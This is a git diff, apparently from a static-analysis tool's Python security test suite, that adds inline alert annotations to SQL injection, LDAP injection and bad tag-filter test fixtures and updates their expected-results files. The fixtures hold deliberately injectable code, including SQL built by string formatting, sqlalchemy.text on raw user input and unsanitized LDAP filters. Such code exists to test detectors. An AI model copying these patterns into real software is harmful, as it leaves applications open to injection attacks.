sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | edges | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | provenance | | | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | provenance | | @@ -35,20 +52,3 @@ nodes | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | semmle.label | ControlFlowNode for username | | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | semmle.label | ControlFlowNode for username | subpaths -#select -| sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.qlref b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.qlref index d1d02cbe8d37..444c0e5f46aa 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.qlref @@ -1 +1,2 @@ -Security/CWE-089/SqlInjection.ql +query: Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sql_injection.py b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sql_injection.py index c79bee16cb21..52aa3169616e 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sql_injection.py +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sql_injection.py @@ -11,19 +11,19 @@ class User(models.Model): pass @app.route("/users/") -def show_user(username): +def show_user(username): # $ Source with connection.cursor() as cursor: # GOOD -- Using parameters cursor.execute("SELECT * FROM users WHERE username = %s", username) User.objects.raw("SELECT * FROM users WHERE username = %s", (username,)) # BAD -- Using string formatting - cursor.execute("SELECT * FROM users WHERE username = '%s'" % username) + cursor.execute("SELECT * FROM users WHERE username = '%s'" % username) # $ Alert # BAD -- other ways of executing raw SQL code with string interpolation - User.objects.annotate(RawSQL("insert into names_file ('name') values ('%s')" % username)) - User.objects.raw("insert into names_file ('name') values ('%s')" % username) - User.objects.extra("insert into names_file ('name') values ('%s')" % username) + User.objects.annotate(RawSQL("insert into names_file ('name') values ('%s')" % username)) # $ Alert + User.objects.raw("insert into names_file ('name') values ('%s')" % username) # $ Alert + User.objects.extra("insert into names_file ('name') values ('%s')" % username) # $ Alert # BAD (but currently no custom query to find this) # diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sqlalchemy_textclause.py b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sqlalchemy_textclause.py index a54d64517d42..f35b1325366c 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sqlalchemy_textclause.py +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sqlalchemy_textclause.py @@ -20,15 +20,15 @@ class User(Base): @app.route("/users/") -def show_user(username): +def show_user(username): # $ Source session = sqlalchemy.orm.Session(engine) # BAD, normal SQL injection - stmt = sqlalchemy.text("SELECT * FROM users WHERE username = '{}'".format(username)) + stmt = sqlalchemy.text("SELECT * FROM users WHERE username = '{}'".format(username)) # $ Alert results = session.execute(stmt).fetchall() # BAD, allows SQL injection - username_formatted_for_sql = sqlalchemy.text("'{}'".format(username)) + username_formatted_for_sql = sqlalchemy.text("'{}'".format(username)) # $ Alert stmt = sqlalchemy.select(User).where(User.username == username_formatted_for_sql) results = session.execute(stmt).scalars().all() @@ -38,14 +38,14 @@ def show_user(username): # All of these should be flagged by query - t1 = sqlalchemy.text(username) - t2 = sqlalchemy.text(text=username) - t3 = sqlalchemy.sql.text(username) - t4 = sqlalchemy.sql.text(text=username) - t5 = sqlalchemy.sql.expression.text(username) - t6 = sqlalchemy.sql.expression.text(text=username) - t7 = sqlalchemy.sql.expression.TextClause(username) - t8 = sqlalchemy.sql.expression.TextClause(text=username) - - t9 = db.text(username) - t10 = db.text(text=username) + t1 = sqlalchemy.text(username) # $ Alert + t2 = sqlalchemy.text(text=username) # $ Alert + t3 = sqlalchemy.sql.text(username) # $ Alert + t4 = sqlalchemy.sql.text(text=username) # $ Alert + t5 = sqlalchemy.sql.expression.text(username) # $ Alert + t6 = sqlalchemy.sql.expression.text(text=username) # $ Alert + t7 = sqlalchemy.sql.expression.TextClause(username) # $ Alert + t8 = sqlalchemy.sql.expression.TextClause(text=username) # $ Alert + + t9 = db.text(username) # $ Alert + t10 = db.text(text=username) # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected index 20170029899e..ae30a38acc32 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected @@ -1,3 +1,14 @@ +#select +| ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | edges | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | @@ -108,14 +119,3 @@ nodes | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | semmle.label | ControlFlowNode for dn | | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | semmle.label | ControlFlowNode for search_filter | subpaths -#select -| ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.qlref b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.qlref index 19112f987ada..87db0e58f847 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.qlref @@ -1 +1,2 @@ -Security/CWE-090/LdapInjection.ql +query: Security/CWE-090/LdapInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap3_bad.py b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap3_bad.py index 2edb986fccfc..a69aef9ad3d8 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap3_bad.py +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap3_bad.py @@ -1,4 +1,4 @@ -from flask import request, Flask +from flask import request, Flask # $ Source import ldap3 app = Flask(__name__) @@ -18,7 +18,7 @@ def normal(): srv = ldap3.Server('ldap://127.0.0.1') conn = ldap3.Connection(srv, user=dn, auto_bind=True) - conn.search(dn, search_filter) + conn.search(dn, search_filter) # $ Alert @app.route("/direct") @@ -35,7 +35,7 @@ def direct(): srv = ldap3.Server('ldap://127.0.0.1') conn = ldap3.Connection(srv, user=dn, auto_bind=True).search( - dn, search_filter) + dn, search_filter) # $ Alert # if __name__ == "__main__": # app.run(debug=True) diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap_bad.py b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap_bad.py index 133b0baaf9c0..8fd38f52f577 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap_bad.py +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap_bad.py @@ -1,4 +1,4 @@ -from flask import request, Flask +from flask import request, Flask # $ Source import ldap app = Flask(__name__) @@ -18,7 +18,7 @@ def normal(): ldap_connection = ldap.initialize("ldap://127.0.0.1") user = ldap_connection.search_s( - dn, ldap.SCOPE_SUBTREE, search_filter) + dn, ldap.SCOPE_SUBTREE, search_filter) # $ Alert @app.route("/direct") @@ -34,7 +34,7 @@ def direct(): search_filter = "(user={})".format(unsafe_filter) user = ldap.initialize("ldap://127.0.0.1").search_s( - dn, ldap.SCOPE_SUBTREE, search_filter) + dn, ldap.SCOPE_SUBTREE, search_filter) # $ Alert @app.route("/normal_argbyname") @@ -52,7 +52,7 @@ def normal_argbyname(): ldap_connection = ldap.initialize("ldap://127.0.0.1") user = ldap_connection.search_s( - dn, ldap.SCOPE_SUBTREE, filterstr=search_filter) + dn, ldap.SCOPE_SUBTREE, filterstr=search_filter) # $ Alert # if __name__ == "__main__": diff --git a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected index e217064d1dfc..58f42bec0c84 100644 --- a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.qlref b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.qlref index 7dbe28e4b591..4379f3d416b4 100644 --- a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.qlref @@ -1 +1,2 @@ -Security/CWE-113/HeaderInjection.ql \ No newline at end of file +query: Security/CWE-113/HeaderInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/BadTagFilter.qlref b/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/BadTagFilter.qlref index e5fc84fd48a9..443c007de0cb 100644 --- a/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/BadTagFilter.qlref +++ b/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/BadTagFilter.qlref @@ -1 +1,2 @@ -Security/CWE-116/BadTagFilter.ql +query: Security/CWE-116/BadTagFilter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/tst.py b/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/tst.py index 2c3ec0667e39..51aa659282bc 100644 --- a/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/tst.py +++ b/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/tst.py @@ -1,28 +1,28 @@ import re filters = [ - re.compile(r""".*?<\/script>""", re.IGNORECASE), # NOT OK - doesn't match newlines or `` - re.compile(r""".*?<\/script>""", re.IGNORECASE | re.DOTALL), # NOT OK - doesn't match `` + re.compile(r""".*?<\/script>""", re.IGNORECASE), # NOT OK - doesn't match newlines or `` # $ Alert + re.compile(r""".*?<\/script>""", re.IGNORECASE | re.DOTALL), # NOT OK - doesn't match `` # $ Alert re.compile(r""".*?<\/script[^>]*>""", re.IGNORECASE | re.DOTALL), # OK re.compile(r"""""", re.IGNORECASE | re.DOTALL), # OK - we don't care regexps that only match comments re.compile(r""")|([^\/\s>]+)[\S\s]*?>"""), #// NOT OK - doesn't match comments with the right capture groups - re.compile(r"""<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"""), # NOT OK - capture groups - re.compile(r"""(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)""", re.IGNORECASE), # NOT OK - capture groups - re.compile(r"""<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))"""), # NOT OK - capture groups + re.compile(r"""]*>([\s\S]*?)<\/script>""", re.IGNORECASE | re.DOTALL), # NOT OK - too strict matching on the end tag # $ Alert + re.compile(r"""<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>"""), #// NOT OK - doesn't match comments with the right capture groups # $ Alert + re.compile(r"""<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"""), # NOT OK - capture groups # $ Alert + re.compile(r"""(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)""", re.IGNORECASE), # NOT OK - capture groups # $ Alert + re.compile(r"""<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))"""), # NOT OK - capture groups # $ Alert ] doFilters(filters) diff --git a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected index fd9b5fe6bb65..67274311bf42 100644 --- a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected @@ -1,3 +1,8 @@ +#select +| LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | 